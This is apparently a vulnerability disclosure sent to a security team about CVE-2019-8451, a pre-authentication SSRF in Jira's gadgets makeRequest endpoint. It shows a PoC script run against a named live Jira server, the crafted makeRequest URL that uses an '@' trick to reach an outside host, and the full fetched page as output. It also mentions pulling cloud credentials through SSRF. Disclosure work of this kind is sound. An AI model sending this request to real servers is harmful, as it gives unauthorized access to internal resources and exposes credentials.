| Hi Security Team, Summary The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. CVE-2019-8451 is a pre-authentication server side request forgery (SSRF) vulnerability found in the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal network resources. The vulnerability was first introduced in Jira Core and Jira Software versions 7.6.0, an enterprise release in November 2017, and affects Jira Core and Software versions from 7.6.0 through 8.3.4. Steps To Reproduce: 1. Target is https://issues.jenkins-ci.org/ use Atlassian Jira Project Management Software (v7.13.6)
2. Lets rock! wayc0de@DESKTOP-9C0TVKV:~/tools/CVE-2019-8451$ python CVE-2019-8451.py https://issues.jenkins-ci.org Result : >>>>SSRF URL: www.baidu.com >>>>Send poc Success! X-AUSERNAME= anonymous >>>>vuln_url= https://issues.jenkins-ci.org/plugins/servlet/gadgets/makeRequest?url=https://issues.jen...@www.baidu.com throw 1; < don't be evil' >{"https://issues.jen...@www.baidu.com":{"rc":200,"headers": {"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]} ,"body":"<!DOCTYPE html>\r\n<!-STATUS OK-><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=https://ss1.bdstatic.com/5eN1bjq8AAUYm2zgoY3K/r/www/cache/bdorz/baidu.min.css><title>百度一下,你就知道<\/title><\/head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> <\/div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class=\"bg s_ipt_wr\"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus=autofocus><\/span><span class=\"bg s_btn_wr\"><input type=submit id=su value=百度一下 class=\"bg s_btn\" autofocus><\/span> <\/form> <\/div> <\/div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻<\/a> <a href=https://www.hao123.com name=tj_trhao123 class=mnav>hao123<\/a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图<\/a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频<\/a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧<\/a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登 录<\/a> <\/noscript> <script>document.write('<a href=\"http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === \"\" ? \"?\" : \"&\")+ \"bdorz_come=1\")+ '\" name=\"tj_login\" class=\"lb\">登录<\/a>');\r\n <\/script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style=\"display: block;\">更多产品<\/a> <\/div> <\/div> <\/div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>关于百度<\/a> <a href=http://ir.baidu.com>About Baidu<\/a> <\/p> <p id=cp>©2017 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读<\/a> <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈<\/a> 京ICP证030173号 <img src=//www.baidu.com/img/gs.gif> <\/p> <\/div> <\/div> <\/div> <\/body> <\/html>\r\n"}} As you can on respond <title>百度一下 ,你就知道<\/title> Reference
1. https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
2. https://jira.atlassian.com/browse/JRASERVER-69793 Impact : An SSRF can provide attackers with the ability to query the cloud provider’s APIs, enumerating permissions and extracting data or executing API commands for other cloud services. Our example above simply aims to get the security credentials from the environment |
